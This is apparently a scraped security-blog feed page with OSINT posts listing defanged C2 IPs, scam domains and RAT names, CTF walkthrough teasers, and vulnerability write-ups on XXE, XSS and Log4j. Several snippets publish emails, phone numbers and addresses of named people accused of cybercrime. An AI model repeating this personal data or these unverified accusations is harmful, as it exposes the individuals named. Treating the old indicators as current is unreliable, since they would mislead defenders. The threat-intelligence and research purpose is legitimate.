    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IP addresses accounts: 61[.]153[.]225[.]253 61[.]156[.]17[.]164 61[.]159[.]174[.]31 216[.]12[.]218[.]213 61[.]172[.]195[.]167 1[.]3[.]5[.]112 61[.]175[.]211[.]198 64[.]82[.]92[.]118 218[.]62[.]16[.]38 61[.]151[.]251[.]199 61[.]158[.]185[.]39 213[.]98[.]75[.]135 5[.]3[.]2[.]34 211[.]147[.]61[.]151 64[.]82[.]91[.]117 212[.]181[.]134[.]31 194[.]226[.]242[.]33 217[.]126[.]111[.]6 61[.]172[.]247[.]85 212[.]57[.]166[…
    The Evolution of Encrypted IM Messaging Platforms - The Rise and Future of the OMEMO Protocol - An Analysis
    Dear blog readers, I've decided to share with everyone an article that I've been recently working on namely the rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the security risks involved in OMEMO type of communications including to offer practical security and privacy recommendation advice which I originally wrote for my ex-employer Armadillo Phone. In a modern and vibrant secure and encrypted mobile device ecosystem facing various hardware and physical security type of threats including the general rise of insecure WiFi hotspots and various other factors including the rise of various nation-state and rogue and malicious advanced persistent threat type of malicious and fraudulent campaigns a new protocol has recently emerged called OMEMO basically lim…
    Exposing a Currently Active Portfolio of Rogue and Fake Tech Support Scam Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of fake and rogue fake tech support scam domains with the idea to assist everyone in their cyber attack attribution efforts. Sample rogue fraudulent and malicious tech support scam domains include: 0120-hfjkahgfu-238[.]cf 1-800-my-apple[.]org 1serversupport[.]com 2serversupport[.]com 3serversupport[.]com 3stepremoval[.]com 4serversupport[.]com 5serversupport[.]com 6serversupport[.]com 7serversupport[.]com 8serversupport[.]com 9inchmonster[.]us 9serversupport[.]com 11serversupport[.]com 22serversupport[.]com 24-7helpline[.]co[.]uk 24hour-apple-support[.]org 24techhelp[.]com 24x7livesolution[.]com 33host[.]net 33serversupport[.]com 44serversupport[.]com 55serversupport[.]com 66serversupport[.]com 77serversupp…
    Profiling FBI's Most Wanted Iran-based Cybercriminals - Mohammad Sagegh Ahmadzadegan - An OSINT Analysis
    In this post I've decided to expose and offer personally identifiable information on the Iran-based cybercriminal known as Mohammad Sagegh Ahmadzadegan for the purpose of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Mohammad Sagegh Ahmadzadegan includes: Name: Mohammad Sagegh Ahmadzadegan Handle: Nitrojen26 Email: nitr0jen26@asia[.]com; Nitrojen26@yahoo[.]com; me@sadahm[.]net Web Site: hxxp://sadahm[.]com Social Media Accounts: https://twitter[.]com/nitrojen26 Sample personally identifiable photos of Mohammad Sagegh Ahmadzadegan include: Stay tuned!
    Profiling FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis
    In this post I've decided to offer in-depth and practical and relevant OSINT analysis of FBI's Most Wanted Cybercriminal Mujtaba Raza from the Forwarderz and SecondEye Solution fake documents and IDs selling Pakistan-based rogue fraudulent and malicious online enterprise with the idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. shy4angels@gmail[.]com shahzadsmb@gmail[.]com khizarh11@yahoo[.]com khizarhayat[.]jaffri@yahoo[.]com muhammadkhizar[.]hayatjaffri@yahoo[.]com mygreentree59@yahoo[.]com khizar14hayat@gmail[.]com muhammadkhizarhayatjaffri@yahoo[.]com threatcc@gmail[.]com mujtaba@forwarderz[.]com syedaliraza940@gmail[.]com raza[.]zaidi92@yahoo[.]com kool_boy92@hotmail[.]com s[.]alirz92@gmail[.]com alimohsin228@gmail[.]com mohsinrazaamiri@gmail[.]com alimohsin228@yahoo[.]com amestypezx@yahoo[.]com mohsin@forwarderz[.]com great_guy1102002@yahoo[.]com support@secondeyesolution[.]com info@forwarderz[.]com forwarderz@yahoo[.]com forwarderzlive@google[.]com forwarderzlive@hotmail[.]com support@secondeyehost[.]com Sample Web sites known to have been used by Forwarderz and  SecondEye Solution:  hxxp://secondeyesolution[.]su hxxp:// secondeyesolution[.]ch hxxp:// secondeyesolution[.]ru hxxp:// secondeyesolution[.]com hxxp:// forwarderz[.]com hxxp:// secondeyehost[.]com Sample screenshots of various Forwarderz and SecondEye Solution domains include: Stay tuned!
    A Peek Inside Today's Modern RATs (Remote Access Tools) and Trojan Horses C&C (Command and Control) Communication Channels - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of RATs (Remote Access Tools) and trojan horses C&C (Command and Control) communication channels including actual currently active names of RATs (Remote Access Tools) and trojan horses with the idea to assist everyone in their cyber attack and cyber attribution campaigns where the C&C (Command and Control) communications channels which I'll share exclusively rely on and use static and dynamic DNS and IP providers for the actual C&C infrastructure which is a common TTP (Tactics Techniques and Procedures) for this type of malicious software releases. Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 include: Casa RAT Back Orifice Bandook RAT Dark Comet Rat Cerberus Cybergate…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio – Part Three – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns[.] Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[…
    Profiling a Currently Active Personal Email Address Portfolio of Members of Iran's Ashiyane Digital Security Team - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active personal email portfolio belonging to members of Iran's  Ashiyane Digital Security Team with the idea to assist everyone in their cyber attack or cyber threat actor attribution campaigns. Sample currently active personal emails known to belong to members of Iran's Ashiyane Digital Security Team: m0stagim@gmail[.]com mtn97[.]hacker@yahoo[.]com si13nt_si13nt@yahoo[.]com midia595@yahoo[.]com Dead[.]Zone@att[.]net n0_sec@yahoo[.]it MagicC0d3r@gmail[.]com Faghat_be_khatere_to6000@yahoo[.]com raminshahkar73@yahoo[.]com nitr0jen26@asia[.]com Lord[.]private@ymail[.]com mehdy007@hotmail[.]fr plus[.]ashiyane@gmail[.]com pashe_kosh9@yahoo[.]com omid[.]ghaffarinia@gmail[.]com Pashekosh8@gmail[.]com pashe_kosh8@yahoo[.]com Sun[.…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part Two – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: smartupdater[.]com cash[.]pornocruto[.]nu pornocruto[.]nu ADASEARCH[.]COM ELITE-VIDEO-FEEDS[.]COM FUCKING-MACHINE[.]NET GREATDILDOS[.]COM TEEN-NUDE-PICTURE[.]COM BDSM-INC[.]COM BOYS-GROUP[.]COM BOYS-INC[.]COM COOL-PANTYHOSE[.]COM GAYS-CLUB[.]COM GAYS-INC[.]COM GET-GAY[.]COM HENTAI-INC[.]COM ILLEGALAREA[.]COM ILLEGALDOMAIN[.]COM LESBIAN-INC[.]COM MATURE-INC[.]COM MATURES-CLUB[.]COM MY-SHEMALE[.]COM PANTYHOSE-INC[.]COM PANTYHOSE-NOW[.]COM PANTYHOSE-SITE[.]…
    Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT Analysis
    Dear blog readers,   I've decided to share with everyone a currently active portfolio of rogue and malicious CoolWebSearch IPs with the idea to help everyone in their cyber attack attribution campaign including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: 008i[.]com 008k[.]com 00hq[.]com 010402[.]com 05p[.]com 0calories[.]net 0cat[.]com 0cj[.]net 100gal[.]net 100sexlinks[.]com 101lottery[.]com 1089288654 10money[.]us 123keno[.]com 130[.]94[.]72[.]17 143fuck[.]com 157[.]238[.]62[.]14 171203[.]com 193[.]125[.]201[.]50 195[.]190[.]118[.]140 195[.]225[.]176[.]14 195[.]225[.]176[.]31 195[.]225[.]177[.]13 195[.]225[.]177[.]8 198[.]65[.]164[.]168 198[.]65[.]164[.]170 198[.]65[.]164[.]171 1check[.]us 1cost[.]us 1-domains-…
    Profiling Yaroslav Vasinskyi from the Kaseya Ransomware Attack Campaign - An OSINT Analysis
    It appears that the U.S Justice Department has recently made arrests in the Kaseya ransomware dropping campaign and I've decided to dig a little bit deeper and actually offer and provide the necessary actionable intelligence in the context of exposing the individuals behind these campaigns in the context of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Yaroslav Vasinskyi: Mobile: +380993082660 Phone: 1-800-225-5324 which is actually the phone number of the FBI Personal email address accounts: yarik45@gmail[.]com, yaroslav2468@mail[.]ru Online handles: Yarik45, Yaroslav2468 ICQ: 635995970 including the following Web site which he is known to have been offering around…
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )

  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    [Cullinan #26] Add XXE (XML External Entity)
    This is Cullinan log #26. I added an XXE entry. Usually I post once several changes have accumulated in Cullinan, but this time the interval got a bit long, so I'm posting it as a log. The countermeasures part of the XXE content has been almost entirely replaced by a single link because OWASP has summarised it so well, but I'll write that part up in more detail myself and update it 😅 Add XXE (XML External Entity)
  • Open

    Exposing FBI's Most Wanted Iran's Mabna Hackers - An OSINT Analysis
    Dear blog readers, In this post I've decided to share actionable intelligence on the online infrastructure of FBI's Most Wanted Iran's Mabna Hackers for the purpose of assisting everyone in their cyber attack and cyber threat actor attribution campaigns. mlibo[.]ml blibo[.]ga azll[.]cf azlll[.]cf lzll[.]cf jlll[.]cf elll[.]cf lllib[.]cf tsll[.]cf ulll[.]tk tlll[.]cf libt[.]ga libk[.]ga libf[.]ga libe[.]ga liba[.]gq libver[.]ml ntll[.]tk ills[.]cf vtll[.]cf clll[.]tk stll[.]tk llii[.]xyz lill[.]pro eduv[.]icu univ[.]red unir[.]cf unir[.]gq unisv[.]xyz unir[.]ml unin[.]icu unie[.]ml unip[.]gq unie[.]ga unip[.]cf nimc[.]ga nimc[.]ml savantaz[.]cf unie[.]gq unip[.]ga unip[.]ml unir[.]ga untc[.]me jhbn[.]me unts[.]me uncr[.]me lib-service[.]com unvc[.]me untf[.]me nimc[.]cf anvc[.]me ebookfafa[…
    Exposing Behrooz Kamalian's Ashiyane ICT Company - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone some practical and actionable threat intelligence information regarding members of the Ashiyane Digital Security Team also known as Behrooz Kamalian's Ashiyane ICT Company for the purpose of assisting everyone in their cyber attack and cyber attack attribution campaigns. Name: Behrooz Kamalian Postal address: Tajrish Sq, Fana Khosro St,Amir Salam Alley,No 22, Ashiyane ICT Company Phone number: 22727284-5 Fax number: 22727283 email: nima.salehi@yahoo.com Technical Handle: nic36928h37 Name: Behrooz Kamalian email: nima.salehi@yahoo.com Domain Name: ashiyane.ir Legal Holder: Behrooz Kamalian Postal address: Unit 28, Floor Seven, 36 Building , Daneshvar alley, Jamalzadeh St. , Enghelab Sq. Tehran, IR 1336925748 Phone number: +98.2166935551 Fax number: +98.2166930577 Admin Contact: nic36928h37 Technical Contact: nic36928h37 Domain Name Server1: ns1.ashiyane.org Domain Name Server2: ns2.ashiyane.org Request Date: 29 December 2005 Last Verification: 21 September 2006 Reseller: Govah Tadbir Rayaneh Postal address: Unir 1 , 1th Floor , No.376 , North Bahar St . Phone number: +98 21 88849956-7 Fax number: +98 21 88307682 email: info@tadbir.ir
    Profiling the Emotet Botnet C&C Infrastructure - An OSINT Analysis
    Dear blog readers, I've decided to share a recently obtained Emotet botnet C&C server IPs for the purpose of empowering everyone with the necessary technical information on their way to track down and monitor the botnet including to possibly assist and help where necessary in terms of cyber attack campaign attribution including cyber threat actor attribution campaigns. Sample currently active Emotet botnet C&C server IPs: hxxp://109[.]123[.]78[.]10 hxxp://66[.]54[.]51[.]172 hxxp://108[.]161[.]128[.]103 hxxp://195[.]210[.]29[.]237 hxxp://5[.]35[.]249[.]46 hxxp://5[.]159[.]57[.]195 hxxp://206[.]210[.]70[.]175 hxxp://88[.]80[.]187[.]139 hxxp://188[.]93[.]174[.]136 hxxp://130[.]133[.]3[.]7 hxxp://162[.]144[.]79[.]192 hxxp://79[.]110[.]90[.]207 hxxp://72[.]18[.]204[.]17 hxxp://212[.]129[.]13[.]…

  • Open

    ZAP vs Burpsuite in my mind at 2022
    Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you'll enjoy it lightly. 📌 TL;DR ZAP has a powerful scripting engine and automation; Burpsuite has a powerful scanning engine and is the early adopter. They’re both really cool tools. 🔍 Compare (ZAP | Burpsuite)
    Proxy: O, HTTP/1.1 | O🎖, HTTP/1.1, HTTP/2
    Passive Scan: O | O
    Active Scan: O | O
    Scan Configuration: O🎖, Easy, Detail control | O
    Scan Results: O, Mapping more information | O, Detail results
    Live Scan: O, ATTACK Mode | O, Live tasks
    Manage scope: O, Detail | O, Easy
    Manage workspace: O | O
    Spidering: O, Spider, Ajax Spider | O, Powerful Crawler
    Extensions (Addons): O, High quality | O🎖, High quality, Many features
    Scripting: O🎖, Zest 👍, Ruby, Python, JS, Groovy, Etc | O, Python, Ruby
    Performance: O, Fast, bu…
    XXE (XML External Entity)
    🔍 Introduction XXE (XML External Entity) is an attack that induces a service that parses and uses XML to parse malicious XML syntax, so that it performs actions intended by the attacker. Because the impact originates wherever the XML parser is located, it can range from internal network access such as SSRF on the light end up to RCE. 🗡 Offensive techniques Detect Simply put, you have to find the places where XML parsing happens. If you can see the source code, searching the code is the fastest and most efficient approach; if you have to judge purely from behaviour without source code, focus on checking places that accept .xml files as arguments or that emit XML-parsing-related errors.

  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-33742: Analysis of an Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability
    1. Vulnerability background 2. Vulnerability overview 3. Analysis environment 3.1 Extracting the vulnerable module 3.2 Disabling ASLR 4. Reproducing the vulnerability 5. Structure of the Internet Explorer DOM tree 5.1 Text-centric design 5.2 Adding layers of complexity 5.3 The original DOM was not encapsulated 6. Root-cause analysis 6.1 Reversing the classes related to this vulnerability in mshtml.dll 6.1.1 CSpliceTreeEngine 6.1.2 CTreeNode 6.1.3 CTreePos 6.1.4 CTreeDataPos 6.1.4.1 Tree::TextData 6.1.4.2 CTxtPtr 6.2 The DOM tree corresponding to the PoC 6.3 Analysis of the root cause 7. Vulnerability fix 8. References. Vulnerability background: On 14 July 2021 Google's Threat Analysis Group (TAG) published an article titled "How We Protect Users From 0-Day Attacks". The article disclosed details of four in-the-wild 0-day vulnerabilities discovered by TAG in 2021: CVE-2021-21166 and CVE-2021-30551 in Google Chrome, CVE-2021-33742 in Internet Explorer, and CVE-2021-1879 in Apple Safari. In April 2021, TAG discovered a campaign targeting Armenian users that used malicious Office documents to invoke Internet Explorer and load a remote malicious web page, exploiting a flaw in the Internet Explorer rendering engine…

  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )

  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    Authz0 v1.1 Released 🎉
    Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary Add setCred command Add --include-zap flag in new command Add --include-har flag in new command Add --include-burp flag in new command Add --assert-fail-size-margin flag in new command Support multiple same assert type Improve report Fixed bugs Credentials and setCred Now, we can add credentials to the template using the setCred command.

  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )

  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-22204 GitLab RCE: In-Depth Analysis of the exiftool Code Execution Vulnerability (Part 2)
    Contents 1 Preface 2 Prerequisites 2.1 JPEG file format 2.2 Perl pattern matching 3 From exiftool source debugging to vulnerability analysis 3.1 Environment setup 3.2 Vulnerability overview 3.3 How exiftool parses the embedded 0xc51b tag 3.4 How exiftool calls the parseAnt function 3.5 Analysis of the parseAnt function 3.6 Analysis of the parseAnt vulnerability 4 Exploitation 4.1 Generating the DjVu file 4.2 Generating the JPG file 5 Fix 6 Summary. Preface: On April 7 security researcher vakzz submitted an RCE vulnerability in GitLab on HackerOne; at the time it was not mentioned whether exploitation required being logged in to GitLab. On October 25 a foreign security company discovered unauthenticated in-the-wild exploitation through log analysis and found a new exploitation method. According to the official advisory page, the safe versions are 13.10.3, 13.9.6 and 13.8.8. The vulnerability consists of two parts: CVE-2021-22005 GitLab unauthenticated exiftool RCE, CVE-2021-22004. The previous article, "CVE-2021-22205 GitLab RCE: In-Depth Analysis of the Unauthenticated Access (Part 1)", reproduced and analysed the first part, i.e. how the request carrying the malicious file is passed through GitLab to exiftool for parsing; next I will analyse the principle of the exiftool vulnerability and the final trigger and exploitation. I hope readers gain something from it and draw their own insights. Prerequisites: As before, in this article I will also go over some prerequisite knowledge so readers can understand the vulnerability more deeply and generalise from it. JPEG file format: This vulnerability can be triggered by reading the EXIF information of a normal JPG image file, and the JPEG file format directly defines e…

  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )

  • Open

    In Chrome, XSS is now possible without the open attribute.
    Among XSS vectors, there is a method that uses the ontoggle event handler and the open attribute on the details tag. It works in Chrome, Safari, Firefox and IE, and because among on*-based XSS it can reduce user interaction relatively easily, it is used often. test Recently, the Chrome 97 update added a new feature: Auto-expand details elements. Literally, this means details elements are expanded automatically, which means that a script can be executed immediately with ontoggle alone, even without using the open attribute.
    Hello Authz0, a new tool for Authorization testing 🚀
    When testing authorization, I like to use ZAP's Zest scripts. In the past I often used an extension called Authz in Burpsuite. Anyway, because these tools are built into ZAP and Burpsuite, they have the huge strength of being able to use raw HTTP requests, but conversely, because of their very detailed features and the mandatory use of raw requests, they tend to be a bit inconvenient for simple tasks. So starting last weekend I built a tool for authorization testing, released it on Sunday afternoon, and thought I'd share it briefly. The tool I'm introducing today is Authz0. What is Authz0 Authz0 is a tool that lets you configure the URLs and roles to test around a YAML-format template file and scan based on that.
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )

  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )

  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )

  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )

  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )

  • Open

    Zest and ZAP! Let's build a powerful security testing routine ⚡️
    What is Zest Zest is a JSON-based scripting language created by the Mozilla security team. It was made for easier web testing, and I often use it in ZAP when testing. Zest in ZAP Honestly, the JSON format itself isn't a great format for rewriting (which is why configs tend to use yaml or toml), so writing it by hand is fairly inconvenient. However, when Zest is used inside ZAP, the logic can be controlled through the GUI interface, so that inconvenience disappears. Zest Structure Zest lets you specify the script's type, parameters and so on in JSON format.
    [Cullinan #25] Plans going forward
    This is Cullinan log #25. Actually, this time it's less an update log and more a post to share my plans going forward. What is Cullinan? First, Cullinan is a toy project I started last March to gather scattered blog posts into a single wiki and keep them maintained continuously. Its beginning is here. Gathering existing posts into single entries and adding entries I hadn't covered one by one, there are already 41 pages. I'll keep adding many entries (there's a pile of them being written in Notion 😅), but now I want to think a bit more about how to present them.

  • Open

    Useful Vscode Extensions
    Which code editor do you use? I was a vim user since my undergraduate days, then went through vim + geany and atom + vim, and have now switched to using vscode and vim at the same time. (I say vim, but actually I use neovim 😅) I was curious and put up a poll, and the percentages differed far more than I expected (I had guessed around 7/3..). Anyway, after moving to vscode I looked into vscode extensions, and I'd like to share the ones I found good after trying several. Atom -> Vscode I was actually a user who was satisfied with Atom and used it well.

  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )

  • Open

    The story of my Main Weapon ⚔️ (ZAP and Proxify)
    In Korea there are about 30 minutes left until the new year, and this post will probably be the last of the year. It feels like I only just looked back on 2020, but the 2021 retrospective has already passed too 😱 Today I want to talk about one part of my retrospective, my Main Weapon :D Main Weapon? Which tool do you like most when doing analysis? The one tool you could pick here is what I consider the Main Weapon. I was a Burpsuite user for a long time; around 2018 my interest in ZAP grew again, and until last year I kept a dual style of using Burpsuite and ZAP at the same time.

  • Open

    If kubectl suddenly reports not found 😫
    The kubectl I used every day suddenly reported not found. (It was probably broken by a brew upgrade at some point) zsh: command not found: kubectl It was already installed, and reinstalling gave the same result. Searching around, this issue seems to occur when it was installed via homebrew. If you reinstall kubectl with brew and use brew link to symlink the installed files into the homebrew prefix, the command works again. $ brew reinstall kubectl $ brew link --overwrite kubernetes-cli For reference, the homebrew prefix is the PATH location used by homebrew.

  • Open

    Log4j 2.17 JDBCAppender RCE (CVE-2021-44832)
    Another one... yet another one came out. Since the previous post was too long to cover everything at once, I plan to split additional CVEs into separate posts. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-2021-45105 (DOS) [2021-12-27] CVE-2021-44832 (RCE) Affected ≤2.17, ≤2.12.3, ≤2.3.1 The versions above are vulnerable. However, they are not unconditionally vulnerable: the attacker needs permission to modify the logging configuration file, so additional factors such as MITM are required for a successful attack. So it is not a Critical issue like the previous RCE, but Major (CVSS 6.

  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )

  • Open

    ZAP's new Import/Export addon, and my speculation about the future
    Recently, several Import and Save related features in ZAP were consolidated into a new addon named "Import/Export". Nothing has changed in the user interface, but it gives a glimpse of the direction ZAP's Import/Export features will take, so I'm writing it up 😎 Import files containing URLs, Log File Importer, Save Raw Message, Save XML Message. The actual addon name of the newly added Import/Export is exim. EXIM is short for EXport & IMport, a term widely used with the same meaning on the web. ZAP addons are more or less required to provide an API, so exim is also exposed via the API.
    Let's scan for Web Cache vulnerabilities 🔭
    Web Cache related vulnerabilities such as Web Cache Poisoning and Web Cache Deception are fairly old techniques, but in the past few years they seem to have advanced rapidly thanks to Portswigger researchers such as albinowax (@albinowax). These vulnerabilities are identified and exploited through various testing methods, but until now there was no tool I considered particularly powerful. (At best there is burpsuite's built-in scanner...) Today I'd like to share a good tool that can quickly identify Web Cache vulnerabilities! Actually, I had been slowly building a related tool since this summer (around June 2021?), but Hackmanit beat me to it.

  • Open

    Dalfox 2.7 Released 🎉
    Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features in this release. But it's better than before, so I recommend an update! Then let's start the review, and have a great holiday 🧑🏼‍🎄 Thank you ❤️ First, thank you so much to all contributors!! Thanks to all of you, this project is getting better and better. Thank you always! Release note Github | DockerHub Add BAV Module ESI Injection Support to windows/arm64 Upgrade go dependency (1.

  • Open

    Links Digest 2021
    What I am currently reading The following is a list of books that I am currently reading. I like to read several books simultaneously to have more options in case I am not ready to absorb specific content. Sapiens: A Brief History of Humankind by Yuval Noah Harari A Brief History of Time by Stephen Hawking How to avoid a climate disaster by Bill Gates The Ride of a Lifetime: Lessons in Creative Leadership from 15 Years as CEO of the Walt Disney by Robert Iger The Double Helix by James Watson Tao Te Ching by Lao Tzu Notes from the Underground by Fyodor Dostoyevsky What I've read The following is a list of books that I've read and recommend to others to read or browse through. This list is not complete and sorted in no particular order. Some books are better than others. One day I will provi…
    Links Digest 2021
    A short list of useful links. Security Blogs https://0x00sec.org/ - don't know yet but it looks interesting https://abiondo.me - ctf and other hacking things from a talented hacker https://www.vulnano.com/ - small blog but cool nevertheless https://bugbountyforum.com/ - interesting info about bug bounties https://xz.aliyun.com/ - interesting blog full of exploits and stuff https://sites.google.com/securifyinc.com/secblogs/table-of-contents - very cool research https://spaceraccoon.dev/ - bug bounty stuff https://samcurry.net - bug bounty stuff Zines https://www.alchemistowl.org/pocorgtfo/ - pocorgtfo https://secret.club - a zine but pretty compact and down to the point https://pagedout.institute/ - not sure yet Reference https://github.com/ngalongc/bug-bounty-reference https://cxsecurity.c…

  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )

  • Open

    Preventing ZAP and Burpsuite from collecting feedback information
    Recently Callhome, one of ZAP's core addons, was updated. Callhome was originally a feature that simply showed news on the main screen, but this time a Telemetry part was added. Telemetry is a feature for collecting ZAP usage information; according to ZAP, it does not collect vulnerabilities or personal information, only simple statistics. In any case, people like me who are sensitive about this kind of data collection will need to disable it separately. (Burpsuite has done this for a long time... 😱) Today, while I'm at it, I'd like to summarize why ZAP and Burpsuite collect this usage information and how to disable it.

  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )

  • Open

    [Cullinan #24] Add ESI Injection and Update Others
    This is Cullinan update log #24. I added ESI Injection, added RCE related content to SSTI, and updated the tools. Finally, I modified part of Cullinan's main page design (removed max-width). Add ESI Injection, Update SSTI (Add RCE, Update Tools), Update Cullinan Design. ESI Injection is an item I shared as a blog post more than 3 years ago; it is not a case seen often in practice, so I had forgotten about it until I recently added it to Cullinan. It is still an interesting vulnerability, so I recommend reading it at least once :D

  • Open

    ESI (Edge Side Include) Injection
